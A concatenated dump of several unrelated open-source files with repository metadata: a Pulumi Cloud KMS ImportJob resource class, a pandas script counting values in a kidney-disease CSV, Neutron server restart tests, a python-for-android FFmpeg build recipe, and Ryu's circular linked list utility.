pulumi.set(self, "protection_level", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
class ImportJob(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
import_job_id: Optional[pulumi.Input[str]] = None,
import_method: Optional[pulumi.Input['ImportJobImportMethod']] = None,
key_ring_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
protection_level: Optional[pulumi.Input['ImportJobProtectionLevel']] = None,
__props__=None):
"""
Create a new ImportJob within a KeyRing. ImportJob.import_method is required.
Auto-naming is currently not supported for this resource.
Note - this resource's API doesn't support deletion. When deleted, the resource will persist
on Google Cloud even though it will be deleted from Pulumi state.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input['ImportJobImportMethod'] import_method: Immutable. The wrapping method to be used for incoming key material.
:param pulumi.Input['ImportJobProtectionLevel'] protection_level: Immutable. The protection level of the ImportJob. This must match the protection_level of the version_template on the CryptoKey you attempt to import into.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ImportJobArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a new ImportJob within a KeyRing. ImportJob.import_method is required.
Auto-naming is currently not supported for this resource.
Note - this resource's API doesn't support deletion. When deleted, the resource will persist
on Google Cloud even though it will be deleted from Pulumi state.
:param str resource_name: The name of the resource.
:param ImportJobArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ImportJobArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
import_job_id: Optional[pulumi.Input[str]] = None,
import_method: Optional[pulumi.Input['ImportJobImportMethod']] = None,
key_ring_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
protection_level: Optional[pulumi.Input['ImportJobProtectionLevel']] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ImportJobArgs.__new__(ImportJobArgs)
if import_job_id is None and not opts.urn:
raise TypeError("Missing required property 'import_job_id'")
__props__.__dict__["import_job_id"] = import_job_id
if import_method is None and not opts.urn:
raise TypeError("Missing required property 'import_method'")
__props__.__dict__["import_method"] = import_method
if key_ring_id is None and not opts.urn:
raise TypeError("Missing required property 'key_ring_id'")
__props__.__dict__["key_ring_id"] = key_ring_id
__props__.__dict__["location"] = location
__props__.__dict__["project"] = project
if protection_level is None and not opts.urn:
raise TypeError("Missing required property 'protection_level'")
__props__.__dict__["protection_level"] = protection_level
__props__.__dict__["attestation"] = None
__props__.__dict__["create_time"] = None
__props__.__dict__["expire_event_time"] = None
__props__.__dict__["expire_time"] = None
__props__.__dict__["generate_time"] = None
__props__.__dict__["name"] = None
__props__.__dict__["public_key"] = None
__props__.__dict__["state"] = None
super(ImportJob, __self__).__init__(
'google-native:cloudkms/v1:ImportJob',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'ImportJob':
"""
Get an existing ImportJob resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = ImportJobArgs.__new__(ImportJobArgs)
__props__.__dict__["attestation"] = None
__props__.__dict__["create_time"] = None
__props__.__dict__["expire_event_time"] = None
__props__.__dict__["expire_time"] = None
__props__.__dict__["generate_time"] = None
__props__.__dict__["import_method"] = None
__props__.__dict__["name"] = None
__props__.__dict__["protection_level"] = None
__props__.__dict__["public_key"] = None
__props__.__dict__["state"] = None
return ImportJob(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def attestation(self) -> pulumi.Output['outputs.KeyOperationAttestationResponse']:
"""
Statement that was generated and signed by the key creator (for example, an HSM) at key creation time. Use this statement to verify attributes of the key as stored on the HSM, independently of Google. Only present if the chosen ImportMethod is one with a protection level of HSM.
"""
return pulumi.get(self, "attestation")
@property
@pulumi.getter(name="createTime")
def create_time(self) -> pulumi.Output[str]:
"""
The time at which this ImportJob was created.
"""
return pulumi.get(self, "create_time")
@property
@pulumi.getter(name="expireEventTime")
def expire_event_time(self) -> pulumi.Output[str]:
"""
The time this ImportJob expired. Only present if state is EXPIRED.
"""
return pulumi.get(self, "expire_event_time")
@property
@pulumi.getter(name="expireTime")
def expire_time(self) -> pulumi.Output[str]:
"""
The time at which this ImportJob is scheduled for expiration and can no longer be used to import key material.
"""
return pulumi.get(self, "expire_time")
@property
@pulumi.getter(name="generateTime")
def generate_time(self) -> pulumi.Output[str]:
"""
The time this ImportJob's key material was generated.
"""
return pulumi.get(self, "generate_time")
@property
@pulumi.getter(name="importMethod")
def import_method(self) -> pulumi.Output[str]:
"""
Immutable. The wrapping method to be used for incoming key material.
"""
return pulumi.get(self, "import_method")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The resource name for this ImportJob in the format `projects/*/locations/*/keyRings/*/importJobs/*`.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="protectionLevel")
def protection_level(self) -> pulumi.Output[str]:
"""
Immutable. The protection level of the ImportJob. This must match the protection_level of the version_template on the CryptoKey you attempt to import into.
"""
return pulumi.get(self, "protection_level")
@property
@pulumi.getter(name="publicKey")
def public_key(self) -> pulumi.Output['outputs.WrappingPublicKeyResponse']:
"""
The public key with which to wrap key material prior to import. Only returned if state is ACTIVE.
"""
return pulumi.get(self, "public_key")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
The current state of the ImportJob, indicating if it can be used.
"""
return pulumi.get(self, "state")
| 43.693069
| 287
| 0.653373
|
4a04f4352876c0d54cf6cc02d56c07a5d43a2512
| 1,521
|
py
|
Python
|
efren-graphs.py
|
luis9614/kidney-linces
|
192c2f6f56a957c3eee5b8242093d67ebbe59f78
|
[
"MIT"
] | null | null | null |
efren-graphs.py
|
luis9614/kidney-linces
|
192c2f6f56a957c3eee5b8242093d67ebbe59f78
|
[
"MIT"
] | null | null | null |
efren-graphs.py
|
luis9614/kidney-linces
|
192c2f6f56a957c3eee5b8242093d67ebbe59f78
|
[
"MIT"
] | null | null | null |
import pandas as pd
"""df = pd.read_csv('renal.csv', header=None) Para iterar solo con indices"""
df = pd.read_csv('renal.csv')
columns = ['age','bp','sg','al','su','rbc','pc','pcc','ba','bgr','bu','sc','sod','pot','hemo','pcv','wc','rc','htn','dm','cad','appet','pe','ane']
def name_frec(filename, name, ignore=()):
    """Count the frequency of each value in one column of a CSV file.

    :param filename: path of the CSV file (first line is the header).
    :param name: column whose values are tallied.
    :param ignore: container of values to exclude, e.g. ``['?']`` for the
        dataset's missing-value placeholder.
    :returns: dict mapping column value -> occurrence count.
    """
    file = pd.read_csv(filename)
    frec = {}
    # Iterate the whole column: the original started at index 1 and
    # silently dropped the first data row from every tally.  Also replaces
    # the mutable-list default argument with an immutable tuple.
    for value in file[name]:
        if value in ignore:
            continue
        frec[value] = frec.get(value, 0) + 1
    return frec
def name_frec_check(filename, name, ignore=()):
    """Count value frequencies in one column, split by CKD diagnosis.

    :param filename: path of the CSV file; must contain a ``class`` column
        whose value ``'ckd'`` marks chronic-kidney-disease rows.
    :param name: column whose values are tallied.
    :param ignore: container of values to exclude, e.g. ``['?']``.
    :returns: tuple ``(frec_c, frec_n)`` — counts for rows with
        ``class == 'ckd'`` and for all other rows, respectively.
    """
    file = pd.read_csv(filename)
    frec_c = {}
    frec_n = {}
    # Single loop replaces the original's two duplicated branches, and
    # iterating the whole column fixes the original's off-by-one that
    # skipped the first data row.
    for value, label in zip(file[name], file['class']):
        if value in ignore:
            continue
        target = frec_c if label == 'ckd' else frec_n
        target[value] = target.get(value, 0) + 1
    return frec_c, frec_n
"""print(name_frec('renal.csv', 'ba'))
print(name_frec('renal.csv', 'pcc'))
print(name_frec('renal.csv', 'su', ['?']))"""
for name in columns:
print(name, name_frec_check('renal.csv', name, ['?']))
| 31.6875
| 146
| 0.518738
|
4a04f4398328c42b48fbbd77ff1fe0d6f79c39bc
| 10,794
|
py
|
Python
|
neutron/tests/functional/test_server.py
|
FreeBSD-UPB/neutron
|
19372a3cd8b4e6e45f707753b914e133857dd629
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/functional/test_server.py
|
FreeBSD-UPB/neutron
|
19372a3cd8b4e6e45f707753b914e133857dd629
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/functional/test_server.py
|
FreeBSD-UPB/neutron
|
19372a3cd8b4e6e45f707753b914e133857dd629
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import multiprocessing
import os
import signal
import socket
import time
import traceback
from unittest import mock
import httplib2
from neutron_lib import worker as neutron_worker
from oslo_config import cfg
from oslo_log import log
import psutil
from neutron.common import utils
from neutron import manager
from neutron import service
from neutron.tests import base as tests_base
from neutron.tests.functional import base
from neutron import wsgi
LOG = log.getLogger(__name__)
CONF = cfg.CONF
# Those messages will be written to temporary file each time
# start/reset methods are called.
FAKE_START_MSG = 'start'
FAKE_RESET_MSG = 'reset'
TARGET_PLUGIN = 'neutron.plugins.ml2.plugin.Ml2Plugin'
class TestNeutronServer(base.BaseLoggingTestCase):
    """Base harness: fork a neutron service and verify SIGHUP restarts it.

    Worker start()/reset() are mocked by subclasses to push marker strings
    (FAKE_START_MSG / FAKE_RESET_MSG) into a multiprocessing queue; the
    test then asserts the exact marker sequence after sending SIGHUP.
    """

    def setUp(self):
        super(TestNeutronServer, self).setUp()
        self.service_pid = None
        self.workers = None
        # Queue shared with the forked service process and its workers.
        self._mp_queue = multiprocessing.Queue()
        self.health_checker = self._check_active
        # Pipe lets the forked service report runtime info (e.g. the bound
        # port) back to the test process.
        self.pipein, self.pipeout = os.pipe()
        self.addCleanup(self._destroy_workers)

    def _destroy_workers(self):
        # SIGKILL so no forked service can outlive the test run.
        if self.service_pid:
            # Make sure all processes are stopped
            os.kill(self.service_pid, signal.SIGKILL)

    def _start_server(self, callback, workers):
        """Run a given service.

        :param callback: callback that will start the required service
        :param workers: number of service workers
        :returns: list of spawned workers' pids
        """
        self.workers = workers

        # Fork a new process in which server will be started
        pid = os.fork()
        if pid == 0:
            # Child: run the service and make sure we never return into
            # the test framework, whatever happens.
            status = 0
            try:
                callback(workers)
            except SystemExit as exc:
                status = exc.code
            except BaseException:
                traceback.print_exc()
                status = 2

            # Really exit
            os._exit(status)

        self.service_pid = pid

        # If number of workers is 1 it is assumed that we run
        # a service in the current process.
        if self.workers > 1:
            # Wait at most 10 seconds to spawn workers
            condition = lambda: self.workers == len(self._get_workers())

            utils.wait_until_true(
                condition, timeout=10, sleep=0.1,
                exception=RuntimeError(
                    "Failed to start %d workers." % self.workers))

            workers = self._get_workers()
            self.assertEqual(len(workers), self.workers)
            return workers

        # Wait for a service to start.
        utils.wait_until_true(self.health_checker, timeout=10, sleep=0.1,
                              exception=RuntimeError(
                                  "Failed to start service."))

        return [self.service_pid]

    def _get_workers(self):
        """Get the list of processes in which WSGI server is running."""

        def safe_ppid(proc):
            # The process may exit between enumeration and the ppid() call.
            try:
                return proc.ppid()
            except psutil.NoSuchProcess:
                return None

        if self.workers > 1:
            # Workers are children of the forked service process.
            return [proc.pid for proc in psutil.process_iter()
                    if safe_ppid(proc) == self.service_pid]
        else:
            return [proc.pid for proc in psutil.process_iter()
                    if proc.pid == self.service_pid]

    def _check_active(self):
        """Dummy service activity check."""
        time.sleep(5)
        return True

    def _fake_start(self):
        # Substituted for a worker's start(); records the call.
        self._mp_queue.put(FAKE_START_MSG)

    def _fake_reset(self):
        # Substituted for a worker's reset(); records the call.
        self._mp_queue.put(FAKE_RESET_MSG)

    def _test_restart_service_on_sighup(self, service, workers=1):
        """Test that a service correctly (re)starts on receiving SIGHUP.

        1. Start a service with a given number of workers.
        2. Send SIGHUP to the service.
        3. Wait for workers (if any) to (re)start.
        """

        self._start_server(callback=service, workers=workers)
        os.kill(self.service_pid, signal.SIGHUP)

        # After sending SIGHUP it is expected that there will be as many
        # FAKE_RESET_MSG as number of workers + one additional for main
        # process
        expected_msg = (
            FAKE_START_MSG * workers + FAKE_RESET_MSG * (workers + 1))

        # Wait for temp file to be created and its size reaching the expected
        # value
        expected_size = len(expected_msg)
        ret_msg = ''

        def is_ret_buffer_ok():
            nonlocal ret_msg
            LOG.debug('Checking returned buffer size')
            # Drain everything the workers pushed into the queue so far.
            while not self._mp_queue.empty():
                ret_msg += self._mp_queue.get()
            LOG.debug('Size of buffer is %s. Expected size: %s',
                      len(ret_msg), expected_size)
            return len(ret_msg) == expected_size

        try:
            utils.wait_until_true(is_ret_buffer_ok, timeout=5, sleep=1)
        except utils.WaitTimeout:
            raise RuntimeError('Expected buffer size: %s, current size: %s' %
                               (len(ret_msg), expected_size))

        # Verify that start has been called twice for each worker (one for
        # initial start, and the second one on SIGHUP after children were
        # terminated).
        self.assertEqual(expected_msg, ret_msg)
class TestWsgiServer(TestNeutronServer):
    """Tests for neutron.wsgi.Server."""

    def setUp(self):
        super(TestWsgiServer, self).setUp()
        self.health_checker = self._check_active
        # Filled once the forked server reports its bound port.
        self.port = None

    @staticmethod
    def application(environ, start_response):
        """A primitive test application."""

        response_body = 'Response'
        status = '200 OK'
        response_headers = [('Content-Type', 'text/plain'),
                            ('Content-Length', str(len(response_body)))]
        start_response(status, response_headers)
        return [response_body]

    def _check_active(self):
        """Check a wsgi service is active by making a GET request."""
        # The forked server writes its port into the pipe (max 5 digits).
        port = int(os.read(self.pipein, 5))
        conn = httplib2.HTTPConnectionWithTimeout("localhost", port)
        try:
            conn.request("GET", "/")
            resp = conn.getresponse()
            return resp.status == 200
        except socket.error:
            return False

    def _run_wsgi(self, workers=1):
        """Start WSGI server with a test application."""
        # Mock start method to check that children are started again on
        # receiving SIGHUP.
        with mock.patch("neutron.wsgi.WorkerService.start") as start_method,\
                mock.patch("neutron.wsgi.WorkerService.reset") as reset_method:
            start_method.side_effect = self._fake_start
            reset_method.side_effect = self._fake_reset
            server = wsgi.Server("Test")
            # Port 0 lets the OS pick a free port.
            server.start(self.application, 0, "0.0.0.0",
                         workers=workers)

            # Memorize a port that was chosen for the service
            self.port = server.port
            os.write(self.pipeout, bytes(str(self.port), 'utf-8'))

            server.wait()

    @tests_base.unstable_test('bug 1930367')
    def test_restart_wsgi_on_sighup_multiple_workers(self):
        self._test_restart_service_on_sighup(service=self._run_wsgi,
                                             workers=2)
class TestRPCServer(TestNeutronServer):
    """Tests for neutron RPC server."""

    def setUp(self):
        super(TestRPCServer, self).setUp()
        self.setup_coreplugin('ml2', load_plugins=False)
        # Patch the core plugin so no real ML2 machinery is started.
        self._plugin_patcher = mock.patch(TARGET_PLUGIN, autospec=True)
        self.plugin = self._plugin_patcher.start()
        self.plugin.return_value.rpc_workers_supported = True

    def _serve_rpc(self, workers=1):
        """Start RPC server with a given number of workers."""
        # Mock start method to check that children are started again on
        # receiving SIGHUP.
        with mock.patch("neutron.service.RpcWorker.start") as start_method,\
                mock.patch(
                    "neutron.service.RpcWorker.reset") as reset_method,\
                mock.patch(
                    "neutron_lib.plugins.directory.get_plugin") as get_plugin:
            start_method.side_effect = self._fake_start
            reset_method.side_effect = self._fake_reset
            get_plugin.return_value = self.plugin
            CONF.set_override("rpc_workers", workers)
            # not interested in state report workers specifically
            CONF.set_override("rpc_state_report_workers", 0)
            rpc_workers_launcher = service.start_rpc_workers()
            rpc_workers_launcher.wait()

    def test_restart_rpc_on_sighup_multiple_workers(self):
        self._test_restart_service_on_sighup(service=self._serve_rpc,
                                             workers=2)
class TestPluginWorker(TestNeutronServer):
    """Ensure that a plugin returning Workers spawns workers"""

    def setUp(self):
        super(TestPluginWorker, self).setUp()
        self.setup_coreplugin('ml2', load_plugins=False)
        # Patch the core plugin so no real ML2 machinery is started.
        self._plugin_patcher = mock.patch(TARGET_PLUGIN, autospec=True)
        self.plugin = self._plugin_patcher.start()
        manager.init()

    def _start_plugin(self, workers=1):
        with mock.patch('neutron_lib.plugins.directory.get_plugin') as gp:
            gp.return_value = self.plugin
            plugin_workers_launcher = service.start_plugins_workers()
            plugin_workers_launcher.wait()

    def test_start(self):
        # Minimal concrete BaseWorker; its abstract methods are then
        # replaced with the queue-recording fakes from the base class.
        class FakeWorker(neutron_worker.BaseWorker):
            def start(self):
                pass

            def wait(self):
                pass

            def stop(self):
                pass

            def reset(self):
                pass

        # Make both ABC happy and ensure 'self' is correct
        FakeWorker.start = self._fake_start
        FakeWorker.reset = self._fake_reset
        workers = [FakeWorker()]
        self.plugin.return_value.get_workers.return_value = workers
        self._test_restart_service_on_sighup(service=self._start_plugin,
                                             workers=len(workers))
| 34.485623
| 79
| 0.623217
|
4a04f4844f9f0c3bee1dcdadd24f325ceeb6aebf
| 4,997
|
py
|
Python
|
pythonforandroid/recipes/ffmpeg/__init__.py
|
Iqoqo/python-for-android
|
9361b9602923ab170b7aeb4e21bf5ec61f8823f2
|
[
"MIT"
] | 2
|
2021-02-05T10:13:05.000Z
|
2021-11-12T07:31:57.000Z
|
pythonforandroid/recipes/ffmpeg/__init__.py
|
Iqoqo/python-for-android
|
9361b9602923ab170b7aeb4e21bf5ec61f8823f2
|
[
"MIT"
] | 6
|
2020-01-31T18:04:48.000Z
|
2021-06-05T10:53:55.000Z
|
pythonforandroid/recipes/ffmpeg/__init__.py
|
Iqoqo/python-for-android
|
9361b9602923ab170b7aeb4e21bf5ec61f8823f2
|
[
"MIT"
] | 1
|
2021-04-08T19:51:07.000Z
|
2021-04-08T19:51:07.000Z
|
from pythonforandroid.toolchain import Recipe, current_directory, shprint
from os.path import exists, join, realpath
import sh
class FFMpegRecipe(Recipe):
    """Cross-compiles FFmpeg n3.4.5 as Android shared libraries.

    The resulting lib*.so files are copied into the target arch's libs
    directory.  Which codecs/protocols are enabled depends on whether the
    optional 'openssl' and 'ffpyplayer_codecs' recipes are in the build
    order.
    """
    version = 'n3.4.5'
    # Moved to github.com instead of ffmpeg.org to improve download speed
    url = 'https://github.com/FFmpeg/FFmpeg/archive/{version}.zip'
    depends = ['sdl2']  # Need this to build correct recipe order
    opts_depends = ['openssl', 'ffpyplayer_codecs']
    patches = ['patches/configure.patch']

    def should_build(self, arch):
        # Rebuild only while the main shared library has not been produced.
        build_dir = self.get_build_dir(arch.arch)
        return not exists(join(build_dir, 'lib', 'libavcodec.so'))

    def prebuild_arch(self, arch):
        self.apply_patches(arch)

    def get_recipe_env(self, arch):
        # FFmpeg's patched configure script reads the NDK location from $NDK.
        env = super(FFMpegRecipe, self).get_recipe_env(arch)
        env['NDK'] = self.ctx.ndk_dir
        return env

    def build_arch(self, arch):
        """Run FFmpeg's ./configure + make for one target architecture.

        The flag list is assembled incrementally; flag ORDER matters to
        configure, so do not reorder the groups below.
        """
        with current_directory(self.get_build_dir(arch.arch)):
            env = arch.get_env()
            flags = ['--disable-everything']
            cflags = []
            ldflags = []

            if 'openssl' in self.ctx.recipe_build_order:
                # TLS support (https) via the openssl recipe's build tree.
                flags += [
                    '--enable-openssl',
                    '--enable-nonfree',
                    '--enable-protocol=https,tls_openssl',
                ]
                build_dir = Recipe.get_recipe('openssl', self.ctx).get_build_dir(arch.arch)
                cflags += ['-I' + build_dir + '/include/']
                ldflags += ['-L' + build_dir]

            if 'ffpyplayer_codecs' in self.ctx.recipe_build_order:
                # libx264 (H.264 encoding)
                flags += ['--enable-libx264']
                build_dir = Recipe.get_recipe('libx264', self.ctx).get_build_dir(arch.arch)
                cflags += ['-I' + build_dir + '/include/']
                ldflags += ['-lx264', '-L' + build_dir + '/lib/']
                # libshine (fixed-point MP3 encoding)
                flags += ['--enable-libshine']
                build_dir = Recipe.get_recipe('libshine', self.ctx).get_build_dir(arch.arch)
                cflags += ['-I' + build_dir + '/include/']
                ldflags += ['-lshine', '-L' + build_dir + '/lib/']
                # Enable all codecs:
                flags += [
                    '--enable-parsers',
                    '--enable-decoders',
                    '--enable-encoders',
                    '--enable-muxers',
                    '--enable-demuxers',
                ]
            else:
                # Enable codecs only for .mp4:
                flags += [
                    '--enable-parser=aac,ac3,h261,h264,mpegaudio,mpeg4video,mpegvideo,vc1',
                    '--enable-decoder=aac,h264,mpeg4,mpegvideo',
                    '--enable-muxer=h264,mov,mp4,mpeg2video',
                    '--enable-demuxer=aac,h264,m4v,mov,mpegvideo,vc1',
                ]

            # needed to prevent _ffmpeg.so: version node not found for
            # symbol av_init_packet@LIBAVFORMAT_52
            # /usr/bin/ld: failed to set dynamic section sizes: Bad value
            flags += [
                '--disable-symver',
            ]

            # disable binaries / doc
            flags += [
                '--disable-ffmpeg',
                '--disable-ffplay',
                '--disable-ffprobe',
                '--disable-ffserver',
                '--disable-doc',
            ]

            # other flags:
            flags += [
                '--enable-filter=aresample,resample,crop,adelay,volume,scale',
                '--enable-protocol=file,http',
                '--enable-small',
                '--enable-hwaccels',
                '--enable-gpl',
                '--enable-pic',
                '--disable-static',
                '--enable-shared',
            ]

            if 'arm64' in arch.arch:
                cross_prefix = 'aarch64-linux-android-'
                arch_flag = 'aarch64'
            else:
                cross_prefix = 'arm-linux-androideabi-'
                arch_flag = 'arm'

            # android:
            flags += [
                '--target-os=android',
                '--cross-prefix={}'.format(cross_prefix),
                '--arch={}'.format(arch_flag),
                '--sysroot=' + self.ctx.ndk_platform,
                '--enable-neon',
                '--prefix={}'.format(realpath('.')),
            ]

            if arch_flag == 'arm':
                cflags += [
                    '-mfpu=vfpv3-d16',
                    '-mfloat-abi=softfp',
                    '-fPIC',
                ]

            env['CFLAGS'] += ' ' + ' '.join(cflags)
            env['LDFLAGS'] += ' ' + ' '.join(ldflags)

            configure = sh.Command('./configure')
            shprint(configure, *flags, _env=env)
            shprint(sh.make, '-j4', _env=env)
            shprint(sh.make, 'install', _env=env)

            # copy libs:
            sh.cp('-a', sh.glob('./lib/lib*.so'),
                  self.ctx.get_libs_dir(arch.arch))


recipe = FFMpegRecipe()
| 36.210145
| 107
| 0.479288
|
4a04f4fb3064cde5b5b6a0e13512bd8d57ff3876
| 8,272
|
py
|
Python
|
ryu/services/protocols/bgp/utils/circlist.py
|
w180112/ryu
|
aadb6609f585c287b4928db9462baf72c6410718
|
[
"Apache-2.0"
] | 975
|
2015-01-03T02:30:13.000Z
|
2020-05-07T14:01:48.000Z
|
ryu/services/protocols/bgp/utils/circlist.py
|
DiegoRossiMafioletti/ryu
|
6f906e72c92e10bd0264c9b91a2f7bb85b97780c
|
[
"Apache-2.0"
] | 66
|
2020-05-22T21:55:42.000Z
|
2022-03-31T12:35:04.000Z
|
ryu/services/protocols/bgp/utils/circlist.py
|
DiegoRossiMafioletti/ryu
|
6f906e72c92e10bd0264c9b91a2f7bb85b97780c
|
[
"Apache-2.0"
] | 763
|
2015-01-01T03:38:43.000Z
|
2020-05-06T15:46:09.000Z
|
# Copyright (C) 2014 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
if six.PY3:
from sys import intern
class CircularListType(object):
    """Instances of this class represent a specific type of list.

    Nodes are linked in a circular fashion, using attributes on the
    nodes themselves.

    Example:
        ItemList = CircularListType(next_attr='_next',
                                    prev_attr='_prev')
        l = ItemList()
        l.prepend(item)

    The created list has the following properties:
      - A node can be inserted O(1) time at the head, tail, or
        after/before another specified node.
      - A node can be removed in O(1) time from any list it may be on,
        without providing a reference to the list.
      - The current node in an iteration can be deleted safely.
    """

    class List(object):
        """An object that represents a list.

        This class is not expected to be used directly by clients. Rather, they
        would use the 'create' method of a CircularListType object to create an
        instance.
        """
        # Define the set of valid attributes so as to make the list
        # head lightweight.
        #
        # We override __getattr__ and __setattr__ so as to store the
        # the next and previous references on the list head in
        # _next_slot_ and _prev_slot_ respectively.
        __slots__ = ["list_type", "head", "_next_slot_",
                     "_prev_slot_"]

        def __init__(self, list_type):
            self.list_type = list_type
            # Save memory by using the List object itself as the head.
            self.head = self
            self.list_type.node_init(self.head)

        def __getattr__(self, name):
            # Map the type's configured next/prev attribute names onto the
            # fixed slots (head nodes cannot grow arbitrary attributes).
            if(name == self.list_type.next_name):
                return self._next_slot_
            if(name == self.list_type.prev_name):
                return self._prev_slot_
            raise AttributeError(name)

        def __setattr__(self, name, value):
            if(name in CircularListType.List.__slots__):
                object.__setattr__(self, name, value)
                return
            if(name == self.list_type.next_name):
                self._next_slot_ = value
                return
            if(name == self.list_type.prev_name):
                self._prev_slot_ = value
                return
            raise AttributeError(name)

        def is_empty(self):
            # The head links to itself iff no node has been inserted.
            return not self.list_type.node_is_on_list(self.head)

        def clear(self):
            """Remove all items from the list."""
            # Make sure that all items are unlinked.
            for node in self:
                self.remove(node)

        def is_on_list(self, node):
            return self.list_type.node_is_on_list(node)

        def append(self, node):
            self.list_type.node_insert_before(self.head, node)

        def prepend(self, node):
            self.list_type.node_insert_after(self.head, node)

        def __iter__(self):
            return self.generator()

        def remove(self, node):
            """Unlink the given node from the list.

            Note that this does not verify that the node is on this
            list. It could even be on a different list.
            """
            self.list_type.node_unlink(node)
            self.list_type.node_del_attrs(node)

        def pop_first(self):
            """Remove the first item in the list and return it."""
            node = self.list_type.node_next(self.head)
            if(node is self.head):
                return None
            self.remove(node)
            return node

        def generator(self):
            """Enables iteration over the list.

            The current item can safely be removed from the list during
            iteration.
            """
            # Keep a pointer to the next node when returning the
            # current node. This allows the caller to remove the
            # current node safely.
            node = self.list_type.node_next(self.head)
            next = self.list_type.node_next(node)
            while(node is not self.head):
                yield node
                node = next
                next = self.list_type.node_next(node)

    #
    # CircularListType methods
    #

    def __init__(self, next_attr_name=None, prev_attr_name=None):
        """Initializes this list.

        next_attr_name: The name of the attribute that holds a reference
                        to the next item in the list.

        prev_attr_name: the name of the attribute that holds a reference
                        to the previous item in the list.
        """
        # Keep an interned version of the attribute names. This should
        # speed up the process of looking up the attributes.
        self.next_name = intern(next_attr_name)
        self.prev_name = intern(prev_attr_name)

    def create(self):
        return CircularListType.List(self)

    def __call__(self):
        """Make a CircularListType instance look like a class by
        creating a list object.
        """
        return self.create()

    def node_init(self, node):
        assert(not self.node_is_on_list(node))
        # Set the node to point to itself as the previous and next
        # entries.
        self.node_set_next(node, node)
        self.node_set_prev(node, node)

    def node_next(self, node):
        # Returns None (rather than raising) for nodes never linked.
        try:
            return getattr(node, self.next_name)
        except AttributeError:
            return None

    def node_set_next(self, node, next):
        setattr(node, self.next_name, next)

    def node_prev(self, node):
        try:
            return getattr(node, self.prev_name)
        except AttributeError:
            return None

    def node_set_prev(self, node, prev):
        setattr(node, self.prev_name, prev)

    def node_del_attrs(self, node):
        """Remove all attributes that are used for putting this node
        on this type of list.
        """
        try:
            delattr(node, self.next_name)
            delattr(node, self.prev_name)
        except AttributeError:
            pass

    def node_is_on_list(self, node):
        """Returns True if this node is on *some* list.

        A node is not on any list if it is linked to itself, or if it
        does not have the next and/prev attributes at all.
        """
        next = self.node_next(node)
        if next == node or next is None:
            assert(self.node_prev(node) is next)
            return False
        return True

    def node_insert_after(self, node, new_node):
        """Insert the new node after node."""
        assert(not self.node_is_on_list(new_node))
        assert(node is not new_node)
        next = self.node_next(node)
        assert(next is not None)
        # Splice new_node between node and its current successor.
        self.node_set_next(node, new_node)
        self.node_set_prev(new_node, node)
        self.node_set_next(new_node, next)
        self.node_set_prev(next, new_node)

    def node_insert_before(self, node, new_node):
        """Insert the new node before node."""
        assert(not self.node_is_on_list(new_node))
        assert(node is not new_node)
        prev = self.node_prev(node)
        assert(prev is not None)
        # Splice new_node between node's current predecessor and node.
        self.node_set_prev(node, new_node)
        self.node_set_next(new_node, node)
        self.node_set_prev(new_node, prev)
        self.node_set_next(prev, new_node)

    def node_unlink(self, node):
        if not self.node_is_on_list(node):
            return
        prev = self.node_prev(node)
        next = self.node_next(node)
        self.node_set_next(prev, next)
        self.node_set_prev(next, prev)
        # Leave the node self-linked so node_is_on_list() reports False.
        self.node_set_next(node, node)
